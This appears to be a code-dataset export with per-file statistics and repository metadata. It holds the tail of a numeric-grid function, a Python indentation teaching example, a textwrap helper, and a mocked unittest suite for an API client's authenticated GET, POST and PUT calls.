[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
return a
| 183.780822
| 281
| 0.306599
| 12,282
| 40,248
| 1.00456
| 0.00114
| 0.946831
| 1.377695
| 1.780191
| 0.994489
| 0.994408
| 0.994245
| 0.994245
| 0.994245
| 0.994245
| 0
| 0.489756
| 0.377882
| 40,248
| 218
| 282
| 184.623853
| 0.002995
| 0
| 0
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009302
| false
| 0
| 0
| 0
| 0.018605
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
b0189be67a7efcafdbbd98ae6766079f13864c9c
| 201
|
py
|
Python
|
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
'''
done
'''
if True:
print ("Satu")
print ("Dua")
else:
print ("Tiga")
print ("Empat")
'''
if True:
print ("Satu")
print ("Dua")
else:
print ("Tiga")
print ("Empat")
'''
| 10.05
| 19
| 0.477612
| 23
| 201
| 4.173913
| 0.391304
| 0.125
| 0.229167
| 0.3125
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0
| 0
| 0.283582
| 201
| 20
| 20
| 10.05
| 0.666667
| 0.019901
| 0
| 0
| 0
| 0
| 0.168421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
b0276ffa5e3e7e0cb2c4651c3953dea93309eb7b
| 97
|
py
|
Python
|
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | null | null | null |
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | 9
|
2021-03-19T01:51:38.000Z
|
2022-03-12T00:23:28.000Z
|
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | null | null | null |
import textwrap
def short_text(text, width=30, placeholder=' [...]'):
    """Collapse whitespace in *text* and truncate it to at most *width* chars.

    Thin wrapper around :func:`textwrap.shorten`: whole words are kept and
    *placeholder* is appended when truncation occurs.

    Args:
        text: String to shorten.
        width: Maximum length of the result, including the placeholder.
        placeholder: Suffix appended when *text* is truncated (new optional
            parameter; the default matches textwrap.shorten's default, so
            existing callers see identical behavior).

    Returns:
        The shortened string.
    """
    return textwrap.shorten(text, width=width, placeholder=placeholder)
| 16.166667
| 46
| 0.752577
| 14
| 97
| 5.142857
| 0.642857
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.14433
| 97
| 5
| 47
| 19.4
| 0.843373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c6d62007adef5f8736c8dc3726e06b244366c371
| 6,091
|
py
|
Python
|
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | null | null | null |
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | 67
|
2021-02-26T02:06:42.000Z
|
2022-03-25T12:45:27.000Z
|
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
import requests
from api.api import Api
#
# Running the tests... At the top level directory type 'nose2 --verbose --log-level debug`
#
# WARNING: ONLY methods beginning with "test_" will be considered tests by 'nose2' :-(
class TestApi(unittest.TestCase):
    """Unit tests for the Api request wrappers (get/post/put) and header handling.

    Run from the top-level directory with ``nose2 --verbose --log-level debug``.
    NOTE: only methods whose names begin with ``test_`` are collected by nose2.
    """

    def setUp(self):
        # Fresh fixture per test: fixed token/URL/path and a new Api instance.
        self.bearer_token = 'NiceToken'
        self.api_url = 'http://www.kollar.com/'
        self.url_path = "happy_goat.html"
        self.api = Api(self.bearer_token, self.api_url)

    @staticmethod
    def _mock_response():
        # Canned 201 response with a no-op json(); used as the side effect of
        # every patched requests call (was duplicated as resp1() in each test).
        r = requests.Response()
        r.status_code = 201
        r.json = lambda: None
        return r

    def _check_auth_header(self, headers):
        # Authenticated calls must carry exactly the fixture bearer token.
        self.assertTrue('Authorization' in headers)
        self.assertEqual(headers['Authorization'], f"Bearer {self.bearer_token}")

    def _check_url_and_verify(self, kwargs):
        # Every request targets base-url + path and disables TLS verification.
        self.assertTrue('url' in kwargs)
        self.assertEqual(kwargs['url'], f"{self.api_url}{self.url_path}")
        self.assertTrue('verify' in kwargs)
        self.assertFalse(kwargs['verify'])

    def test_add_extra_headers_with(self):
        headers = self.api.add_extra_headers({'extra_header': 'value'})
        self.assertEqual(len(headers.keys()), 2)
        self._check_auth_header(headers)
        self.assertTrue('extra_header' in headers)
        self.assertEqual(headers['extra_header'], 'value')

    def test_add_extra_headers_without(self):
        headers = self.api.add_extra_headers({})
        self.assertEqual(len(headers.keys()), 1)
        self._check_auth_header(headers)
        self.assertFalse('extra_header' in headers)

    @patch('api.api.requests.get')
    def test_request_get(self, mock_get):
        mock_get.side_effect = [self._mock_response()]
        self.api.request_get(self.url_path)
        mock_get.assert_called()
        kwargs = mock_get.call_args_list[-1][1]
        self._check_url_and_verify(kwargs)
        self.assertTrue('headers' in kwargs)
        headers_from_call = kwargs['headers']
        self.assertEqual(len(headers_from_call.keys()), 1)
        self._check_auth_header(headers_from_call)

    @patch('api.api.requests.get')
    def test_request_get_public(self, mock_get):
        # The public variant must NOT attach any headers (no Authorization).
        mock_get.side_effect = [self._mock_response()]
        self.api.request_get_public(self.url_path)
        mock_get.assert_called()
        kwargs = mock_get.call_args_list[0][1]
        self._check_url_and_verify(kwargs)
        self.assertFalse('headers' in kwargs)

    @patch('api.api.requests.post')
    def test_request_post(self, mock_post):
        mock_post.side_effect = [self._mock_response()]
        json = {'test': 'value'}
        self.api.request_post(self.url_path, json)
        mock_post.assert_called()
        kwargs = mock_post.call_args_list[-1][1]
        self._check_url_and_verify(kwargs)
        self.assertTrue('json' in kwargs)
        self.assertEqual(kwargs['json'], json)
        self.assertTrue('headers' in kwargs)
        headers_from_call = kwargs['headers']
        self.assertEqual(len(headers_from_call.keys()), 1)
        self._check_auth_header(headers_from_call)

    @patch('api.api.requests.post')
    def test_request_post_extra_headers(self, mock_post):
        # Extra headers supplied by the caller ride along with Authorization.
        mock_post.side_effect = [self._mock_response()]
        json = {'test': 'value'}
        self.api.request_post(self.url_path, json, {'extra_header': 'value'})
        mock_post.assert_called()
        kwargs = mock_post.call_args_list[-1][1]
        self._check_url_and_verify(kwargs)
        self.assertTrue('json' in kwargs)
        self.assertEqual(kwargs['json'], json)
        self.assertTrue('headers' in kwargs)
        headers_from_call = kwargs['headers']
        self.assertEqual(len(headers_from_call.keys()), 2)
        self._check_auth_header(headers_from_call)
        self.assertTrue('extra_header' in headers_from_call)
        self.assertEqual(headers_from_call['extra_header'], 'value')

    @patch('api.api.requests.put')
    def test_request_put(self, mock_put):
        mock_put.side_effect = [self._mock_response()]
        json = {'test': 'value'}
        self.api.request_put(self.url_path, json)
        mock_put.assert_called()
        kwargs = mock_put.call_args_list[-1][1]
        self._check_url_and_verify(kwargs)
        self.assertTrue('json' in kwargs)
        self.assertEqual(kwargs['json'], json)
        self.assertTrue('headers' in kwargs)
        headers_from_call = kwargs['headers']
        self.assertEqual(len(headers_from_call.keys()), 1)
        self._check_auth_header(headers_from_call)
| 34.219101
| 91
| 0.625185
| 784
| 6,091
| 4.669643
| 0.110969
| 0.047801
| 0.034417
| 0.042065
| 0.844032
| 0.807157
| 0.807157
| 0.786124
| 0.786124
| 0.748156
| 0
| 0.015682
| 0.235758
| 6,091
| 178
| 92
| 34.219101
| 0.770784
| 0.028403
| 0
| 0.7
| 0
| 0
| 0.154379
| 0.03162
| 0
| 0
| 0
| 0
| 0.453846
| 1
| 0.1
| false
| 0
| 0.030769
| 0
| 0.176923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
05b99425d32174477e22d2a498473fb7fed37eee
| 38,695
|
py
|
Python
|
